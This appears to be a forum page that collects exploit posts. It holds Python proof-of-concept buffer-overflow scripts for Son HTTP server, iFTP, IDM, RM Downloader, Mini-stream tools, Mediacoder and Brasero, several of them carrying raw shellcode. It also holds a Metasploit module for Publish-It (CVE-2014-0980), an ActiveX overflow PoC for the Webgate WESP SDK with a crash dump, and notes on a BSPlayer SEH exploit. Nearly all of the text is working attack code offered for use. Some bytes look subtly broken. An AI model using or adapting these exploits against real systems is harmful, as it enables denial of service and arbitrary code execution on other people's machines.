Search the Community

# Exploit Title: Son HTTP HServer stack buffer overflow # Date: 2015 June # Author: sleed - [URL="http://www.rstforums.com"]Romanian Security Team - Homepage[/URL] & Pwnthecode.org # Version: 0.9 # Tested on: Windows 8 # # Description: A simple bof denial of service in Son HTTP HServer # # import socket import struct payload = "\x42\x41\x43" * 80392 payload += "\x81\xc4\xf0\xea\xff\xff" + "B" * 70330 payload += "\x0r" + "C" * 110030 print "[+] sending payload: ", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.100", 80)) buf = ( "GET /" + payload + " HTTP/1.1\r\n" + "Host: 192.168.0.101" + "\r\n\r\n" ) s.send(buf) s.close() //Cine are chef sa-si bata capul, sa TREACA DE ASLR si DEP e my guest

#!/usr/bin/python ########################################################################################### #Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC #Author: dogo h@ck #Date Discovered : 12-5-2015 #Vendor Homepage: http://www.memecode.com/iftp.php #Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe #Version: 2.21 #Tested on : Windows XP Sp3 ########################################################################################### #Crash : Go to Connect > Host Address > Post it #Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% ) ############################################################################################ buffer = "A"*1865 buffer +="BBBB" #Pointer to next SEH record buffer +="CCCC" #SE handler buffer +="D"*500 file = "buffer.txt" f = open(file, "w") f.write(buffer) f.close() Source

I now somebody using another techniques ..breakpoint on return address and find the ESP that..but I preferred the old school techniques. In this video we are going to see how to make a simple stack overflow on Linux. Required knowledge: - Understanding the concept behind buffer overflows. - Basic ASM and C/C++ knowledge. - Exploiting techniques.

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: IDM v6.20 Local Buffer Overflow #[+] Date: 27-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: https://www.internetdownloadmanager.com/ #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/7et4xSh.png #[+] Create IDMLBOF.txt then open , copy the content then go to Options-VPN/Dial Up and paste it in the username field. from struct import pack file="IDMLBOF.txt" junk="\x41"*2313 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78" "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3" "\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd" "\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8" "\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5" "\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87" "\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca") writeFile = open (file, "w") writeFile.write(junk+eip+nops+shellcode) writeFile.close() Source: http://dl.packetstormsecurity.net/1503-exploits/idm620-overflow.txt

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # http://www.exploit-db.com/exploits/8628/ #POC: #IMG1: #http://i.imgur.com/87sXIj8.png from struct import pack file="crack.ram" junk="\x41"*35032 eip=pack('<I',0x7C9D30D7) junk2="\x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #http://www.exploit-db.com/exploits/28996/ shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") writeFile = open (file, "w") writeFile.write(junk+eip+junk2+shellcode) writeFile.close() Source

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream Ripper v2.7.7.100 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Original POC: # http://www.exploit-db.com/exploits/11197/ #POC: #IMG1: #http://i.imgur.com/ifXYgwx.png #IMG2: #http://i.imgur.com/ZMisj6R.png from struct import pack file="crack.m3u" junk="\x41"*35032 eip=pack('<I',0x7C9D30D7) junk2="\x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #http://www.exploit-db.com/exploits/28996/ shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") writeFile = open (file, "w") writeFile.write(junk+eip+junk2+shellcode) writeFile.close() Source

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream RM-MP3 Converter v2.7.3.700 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow #POC: #IMG1: #http://i.imgur.com/ESt0CH8.png #IMG2: #http://i.imgur.com/K39tpYj.png from struct import pack file="crack.m3u" junk="\x41"*35032 eip=pack('<I',0x7C9D30D7) junk2="\x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #Messagebox Shellcode (113 bytes) - Any Windows Version shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") writeFile = open (file, "w") writeFile.write(junk+eip+junk2+shellcode) writeFile.close() Source: http://dl.packetstormsecurity.net/1503-exploits/ministreamrmmp3273700-overflow.txt

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Publish-It PUI Buffer Overflow (SEH)', 'Description' => %q{ This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Daniel Kazimirow', # Original discovery 'Andrew Smith "jakx_"', # Exploit and MSF Module ], 'References' => [ [ 'OSVDB', '102911' ], [ 'CVE', '2014-0980' ], [ 'EDB', '31461' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0b\x0a", 'DisableNops' => true, 'Space' => 377 }, 'Targets' => [ [ 'Publish-It 3.6d', { 'Ret' => 0x0046e95a, #p/p/r | Publish.EXE 'Offset' => 1082 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Feb 5 2014', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class) end def exploit path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui") fd = File.open(path, "rb") template_data = fd.read(fd.stat.size) fd.close buffer = template_data buffer << make_nops(700) buffer << payload.encoded buffer << make_nops(target['Offset']-payload.encoded.length-700-5) buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399 buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump buffer << make_nops(2) buffer << [target.ret].pack("V") print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(buffer) end end Source

# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) # Date: 11/29/2010 # Author: Hadji Samir s-dz@hotmail.fr # Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe # Version: 0.8.33 build 5680 EAX 0012E788 ECX 43434343 EDX 00000000 EBX 43434343 ESP 0012E724 EBP 0012E774 ESI 0012E788 EDI 00000000 #!/usr/bin/python buffer = ("http://" + "A" * 845) nseh = ("B" * 4) seh = ("C" * 4) junk = ("D" * 60) f= open("exploit.lst",'w') f.write(buffer + nseh + seh + junk) f.close() Source: http://www.exploit-db.com/exploits/35531/

#!/usr/bin/python #Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC #Date Discovered: 15th March' 2015 # Exploit Author: Avinash Kumar Thapa "-Acid" # Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop # Homepage:https://wiki.gnome.org/Apps/Brasero # Tested on: Kali Linux 1.0.9 buffer ="A"*26109 buffer += "CCCC" buffer += "D"*10500 file = "crash.m3u" f = open(file, "w") f.write(buffer) f.close() # After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session. ##################################################################### # -Acid # ##################################################################### Source

Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both network DVR and network camera. Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc http://www.webgateinc.com/wgi/eng/#2 http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow CompanyName WebgateInc FileDescription WESPConfig Module FileVersion 1, 6, 42, 0 InternalName WESPConfig LegalCopyright Copyright (C) 2004-2010 OriginalFileName WESPConfig.DLL ProductName WESPConfig Module ProductVersion 1, 6, 42, 0 ******************PoC for one of the above Vulnerabilities*********** <html> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <!-- targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll" prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )" memberName = "ConnectEx3" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" argCount = 8 --> <script language='vbscript'> arg1=1 arg2=String(1044, "A") arg3=1 arg4="defaultV" arg5="defaultV" arg6=1 arg7=1 arg8="defaultV" target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 </script> </html> ****************************** Stack trace for above PoC Exception Code: ACCESS_VIOLATION Disasm: 76ACD33D MOV CX,[EAX] Seh Chain: -------------------------------------------------- 1 41414141 Called From Returns To -------------------------------------------------- msvcrt.76ACD33D WESPPlayback.999539 WESPPlayback.999539 41414141 41414141 22E5E0 22E5E0 2F712C 2F712C 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Registers: -------------------------------------------------- EIP 76ACD33D EAX 41414141 EBX 039E0040 -> 009DF298 ECX E0551782 EDX 41414141 EDI 76AD4137 -> 8B55FF8B ESI 76ACD335 -> 8B55FF8B EBP 0022E56C -> 039E0020 ESP 0022E56C -> 039E0020 Block Disassembly: -------------------------------------------------- 76ACD333 NOP 76ACD334 NOP 76ACD335 MOV EDI,EDI 76ACD337 PUSH EBP 76ACD338 MOV EBP,ESP 76ACD33A MOV EAX,[EBP+8] 76ACD33D MOV CX,[EAX] <--- CRASH 76ACD340 INC EAX 76ACD341 INC EAX 76ACD342 TEST CX,CX 76ACD345 JNZ SHORT 76ACD33D 76ACD347 SUB EAX,[EBP+8] 76ACD34A SAR EAX,1 76ACD34C DEC EAX 76ACD34D POP EBP ArgDump: -------------------------------------------------- EBP+8 41414141 EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+20 00000829 EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Stack Dump: -------------------------------------------------- 22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................] 22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......] 22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............] 22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] 22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from vendor Best Regards, Praveen Darshanam Source

# Exploit Title: Bsplayer HTTP Response BOF # Date: Jan 17 ,2015 # Exploit Author: Fady Mohamed Osman (@fady_osman) # Vendor Homepage: www.bsplayer.com # Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html # Version: current (2.68). # Tested on: Windows 7 sp1 x86 version. # Exploit-db : http://www.exploit-db.com/author/?a=2986 # Youtube : https://www.youtube.com/user/cutehack3r Exploit: http://www.exploit-db.com/sploits/35841.tar.gz Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I needed to load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed that one of the dlls that matches this criteria is (MSVCR71.dll) and it's loaded when I loaded an flv file over the network and that's why I'm sending a legitimate flv file first so later we can use the loaded dll. Also the space after the seh record is pretty small so what I did is that I added a small stage shell cdoe to add offset to esp so it points at the beginning of my buffer and then a jmp esp instruction to execute the actual shellcode. -- *Regards,* Fady Osman about.me/Fady_Osman <http://about.me/Fady_Osman> Source